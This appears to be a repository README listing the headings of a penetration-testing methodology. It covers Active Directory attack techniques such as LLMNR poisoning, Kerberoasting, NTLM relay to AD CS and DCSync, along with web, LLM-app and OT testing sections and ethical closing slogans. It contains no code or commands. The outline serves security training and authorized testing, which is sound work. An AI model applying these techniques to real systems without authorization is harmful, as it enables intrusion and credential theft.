Practical Penetration Testing References
This repository provides a guideline/methodology for conducting professional penetration tests across environments.
A holistic approach to penetration testing, assessing an organization's security posture by simulating real-world attacks, across all aspects of its systems, not just focusing on individual vulnerabilities.
Thanks too all for your support by buying me coffee, thanks you so much
\o/
-
Active Directory Windows Hosts Attacks
- Reconnaissance Unauthenticated
- Initial Network Enumeration
- Passive Reconnaissance
- Active Host Discovery
- Detect Active Directory Domain
- MITM - LLMNR/NBT-NS Poisoning
- Crack NTLMv2 hashes stolen
- Enumeration Unauthenticated
- RID Bruteforce Enumerate
- Brute Forcing
- Username as Password Attack
- Password Spraying
- Authenticated Initial Access
- AD Password Policy
- Vulnerability Scanning
- ESC7 Certificate Authority
- Coercing Authentication
- PetitPotam - Authenticated
- Coercer Tool Identify vulnerabilities
- Active Directory Enumeration
- Computer Account Admin
- Users Generic Write All
- Targeted Kerberoasting attack
- Relay Attacks
- NTLM Relay
- Kerberos
- Convert kirbi to Ccache
- Dump KRBTGT Hash
- Persistence or Lateral
- ESC8 NTLM Relay to AD CS
- Lab CA Configuration
- Check CA for NTLM
- CA Enumeration
- Start NTLM Relay
- Coercing DC
- Stolen Certificate
- Authenticate as DC
- Computer DCSYNC Attack
- User DCSYNC Attack
- Certificate Authority Exploit ESC1..ESC16
- Other Relay & MITM References
- IPv6 attacks
- ESC8 NTLM Relay to AD CS
- Reconnaissance Unauthenticated
-
Penetration Testing Methodology - Holistic Approach
- Reconnaissance
- Enumeration
- Research
- Exploitation
- Hosting
- File transfer
- Shells & Payloads
- Cracking
- Exploits
- Metasploit
- Code Reverse Engineering
- POST Exploitation
- Microsoft Windows / AD
- Linux
- APIs & Web Applications
- OWASP Web Application Testing
- OWASP Large Language Model Apps
- Attacking Systems
- Active Directory
- Email / SMTP / Microsoft Exchange / Outlook Web Access
- Printers
- DNS
- Oracle
- Wireless
- OT, SCADA, PLC & EWS
- Reporting
- Foundation Skills
- PenTest Practice Learning Platforms
- Knowledge-Base
✅ Offensive engagement lifecycle, scoping, rules of engagement, reporting and remediation.
✅ Includes checks and recommended tools for enumeration, exploitation, privilege escalation, and persistence.
✅ Continuously updated on shifting landscape, assessments, emerging threats, and evolving best practices.
- MITRE ATT&CK
- OWASP Application Security Verification Standard - ASVS
- OWASP Artificial Intelligence Security Verification Standard AISVS - LLM
- NIST Cybersecurity Framework
Tools are only as powerfull as the hands that use them.
Tools can reveal a crack in our armor.
Our job is to find and seal the cracks in the armor.
Best hackers think like attackers, but act as protectors.
Stay curious, stay ethical, and keep learning.